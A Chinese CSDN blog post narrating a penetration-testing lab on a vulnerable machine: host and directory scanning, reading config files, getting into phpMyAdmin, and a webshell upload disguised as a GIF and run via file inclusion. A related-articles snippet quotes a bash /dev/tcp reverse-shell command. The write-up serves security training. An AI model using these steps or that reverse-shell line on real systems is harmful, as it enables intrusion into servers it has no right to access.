[[IndiShell Lab]]靶机实验

最新推荐文章于 2024-03-22 22:58:43 发布
最新推荐文章于 2024-03-22 22:58:43 发布
阅读量646 收藏
点赞数 1
文章标签: 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42890862/article/details/107048123
版权

一、nmap扫描192.168.6.0网段存活主机
在这里插入图片描述二、扫描各个ip的80端口是否开启(发现192.168.6.1/10/12/105中80端口开启)
在这里插入图片描述三、测试发现192.168.6.12为目标网站,对其进行详细扫描
在这里插入图片描述四、进入该网站首页
在这里插入图片描述五、通过目录扫描,发现以下目录root@kali:~# dirb “http://192.168.6.12”
在这里插入图片描述六、进入到各目录页面中
在这里插入图片描述在这里插入图片描述
此页面提示有蹊跷!!!!
在这里插入图片描述七、在url中写入路径发现页面没有变化,则判断数据提交方式为post,在test.php页面中使用hackbar插件,用post方法下载各个文件,在c.php中找到配置文件,发现了相关数据库名及密码
在这里插入图片描述在这里插入图片描述八、进入到192.168.6.12/phpmy页面中使用密码进入其数据库,找到用户名及密码
在这里插入图片描述九、进入该网站
在这里插入图片描述十、此处有文件上传位置,发现只能上传图片格式的文件,上传1.t格式文件发现也不能上传,则判断为白名单的验证方式(白名单上传文件使用截断或漏洞解析方式,但发现php版本为5.3.10,不能使用截断)
在这里插入图片描述

标题

十一、上传文件名为.gif的一句话木马文件上传失败,给其加上文件头后上传成功,但是不能解析成.php文件,而且php文件死活传不上去,此时考虑文件包含
在这里插入图片描述十二、在panel.php配置文件中发现存在文件包含,且为POST请求方式(无法在url中实现,考虑使用插件hackbar提交post请求)
在这里插入图片描述十三、使用文件包含上传.jpg文件,提交post请求页面显示包含成功,但是无法显示是否上传解析成功
在这里插入图片描述十四、考虑直接写入一个文件,将该文件以文件包含的形式上传,进入页面后发现上传解析成功
在这里插入图片描述在这里插入图片描述在这里插入图片描述十五、使用菜刀或蚁剑连接进入其目录
在这里插入图片描述

豆豆的豆芽儿
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Neos的渗透测试靶机练习——Wakanda
qq_38678845的博客
01-19 2833
一次渗透测试靶机练习,希望对我们能有所帮助。
多节点实验靶机练习(二)
guowenkecom的博客
11-22 402
目录项目名称:实验环境:靶机下载地址:实验要求:所需工具:环境搭建项目实施1. 测试网站的访问性2.信息收集3.漏洞探寻及利用 项目名称: 实验靶机练习(二) 实验环境: Linux内网机器两台 window 2003 一台 win2003 为外网可以访问到的机器 网卡为nat IP为192.168.100.130 靶机下载地址: 实验要求: 找到三个flag,禁止在实验过程中操作虚拟机 所需工具...
OWASP Mutillidae 靶机实验指导书
06-08
该指导书对每个页面存在漏洞进行了详细分类,对OWASP Top 10 应用安全风险-2017中的漏洞举例说明,结合靶机使用还不错。
vulnhub-DC7靶机实验
m0_64118193的博客
12-03 172
官网地址: https://download.vulnhub.com/dc/DC-6.zip 靶机文件下载后导入即可使用,靶机只有一个flag值 DC6靶机IP地址: 192.168.18.128 kali攻击机IP地址:192.168.18.101 开放端口,,我们进行网站登陆 在主机上进行查询用户信息 下载文件后进行解压,在中发现有用信息 用户名 密码 是一种基于密钥的加密方式,使用了一对密钥对消息进行,来保证消息的安全传输格式是用来加密文件的。 如果这个文件可写,那么直接就可以了。使用看一下权限,
happycorp_1 靶机实验实战演练
lianliandad的博客
06-29 979
happycorp_1靶机
2021-12-16 综合靶机实验
夕阳的街道的博客
12-16 2850
一、实验题目:综合靶机实验 二、实验内容: 1.使用msf搜索可利用漏洞(drupal) 2. 寻找目标网站的配置文件 3.数据库管理员提权(更新管理员密码或者添加一个新用户) 4. suid提权的命令(nmap、vim、find、bash、more、less、nano、cp) 三、实验环境: 1.kali虚拟机:192.168.112.130 2. 靶机:192.168.112.138 四、实验步骤: 1.搜索存活靶机,输入命令: masscan 网段 -p 80 ..
sqli-labs-master靶机
10-12
sqli-labs-master。
PWN靶机环境 网络安全
05-23
PWN靶机环境
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
web渗透测试靶机(新手)
05-07
web渗透测试靶机(新手)
Metasploitable2靶机漏洞详解
12-11
Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。
靶机实战(g0rmint)
weixin_45605313的博客
07-04 257
g0rmint实验环境实验过程信息收集主机发现端口扫描服务发现目录扫描漏洞发现漏洞利用反弹shell提权总结 实验环境 靶机:g0rmint 测试机:kali(IP:192.168.186.128),win10 实验过程 信息收集 主机发现 netdiscover -I eth0 -r 192.168.186.0/24 nmap -sn 192.168.186.0/24 arp-scan -l ,arp-scan 192.168.186.0/24 端口扫描 服务发现 查看web主页,没有主页 目录
vulnhub-Billu_b0x(getshell成功)
qq_43006864的博客
03-29 1680
这一篇是接上一篇,上一篇没getshell。后面查了原因。然后紧跟 上面一篇文章开始。 开始弹shell。这里用到的命令。echo “bash -i >& /dev/tcp/192.168.1.113/4321 0>&1“ | bash 需进行url编码,这里我使用小火狐进行编码,之前用站长工具能在线编码会出现头尾无法编码的现象, 编码后 :%65%63%68%6f%20%22%62%61%73%68%20%2d%69%20%3e%26%2...
靶机渗透测试实战(八)——Billu_creat_Files渗透实战
橘子女侠
05-11 2513
目录 一. 实验环境 二. 实验流程 三. 实验步骤 (一)信息收集——主机发现 1. 查看Kali的IP信息;(IP:192.168.37.131) 2. 扫描主机(netdiscover) (二)信息收集——端口扫描 1. 扫描端口(masscan) 2. 详细扫描端口信息(nmap) (三)渗透测试 80端口(http服务) 1. 访问目标靶机的80端口 ...
PHP文件包含漏洞利用思路与Bypass总结手册(三)
蚁景网安学院
05-06 489
绕过姿势我们平常很多时候碰到的情况肯定不会是简单的include $_GET['file'];这样直接把变量传入包含函数的。在很多时候包含的变量/文件不是完全可控的。现在...
[ 转]渗透测试实战-billu b0x2靶机入侵
zgy956645239的博客
03-01 814
billu b0x2靶机 老规矩 nmap 开路 通过探测可以看到该靶机一共开放了5个端口,我们还是把目光放在80端口上 访问如图: 看到底下 该网站使用了 “Drupal”框架搭建,前几个月该框架曝光过一个高危漏洞,根据这些靶机的惯用尿性,应该是存在该漏洞的。通过MSF来搜索该漏洞,如图: 发现有漏洞,调用模块输入ip和payload,如图: 成功拿下shell。。。。 如图:...
第一次的靶机实验Tr0ll
最新发布
QiingYuu的博客
03-22 303
进行爆破时发现都不行,之后又发现获取密码时的访问目录有个提示(this folder contains the password(此文件夹包含密码)),那么文件名也有可能是密码然后把文件名保存在密码本中尝试爆破一下。发现 Find address 0x0856BF to proceed(翻译为:查找地址0x0856BF以继续),那么对该网址进行访问。之后发现并没有什么有用的信息,继续查看其他端口信息发现21端口可以匿名登录,进行登录。查找的这两个信息就可以尝试进行ssh连接,可以用hydra进行爆破。
一键搭建靶场OWASP Mutillidae II:保持冷静并保持警惕
Gjqhs的博客
03-14 6758
先检查一下docker状态 systemctl status docker 一键安装 docker pull citizenstig/nowasp 安装完 docker run -d -p 9009:80 citizenstig/nowasp 然后查看IP ifconfig 最后浏览器访问即可(你的IP) http://IP地址:9009/index.php 搞事情! ...
网络安全 kali虚拟机中的渗透实验
weixin_46067990的博客
04-11 5937
使用工具:kali虚拟机 一台靶机(准备的WindowsXP靶机) 渗透实验过程 用kali攻击Windows的XP系统 1、 先扫描找漏洞(已经准备好了一个微软平台的08年的漏洞MS08.67) 2、 渗透成功之后,建立一个反弹的连接 3、 运用权限,远程建立一个用户 4、 留后门的工作暂时先不进行 5、 成功之后返回 ...
安装部署Web安全测试用的靶机
11-24
本次实验的名称是“安装部署Web安全测试用的靶机”,实验人是杨子浩,日期是2021年11月24日。实验的目的是为了安装并部署一个用于Web安全测试的靶机实验的拓扑是在本地环境中进行,使用了XAMPP作为服务器软件...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值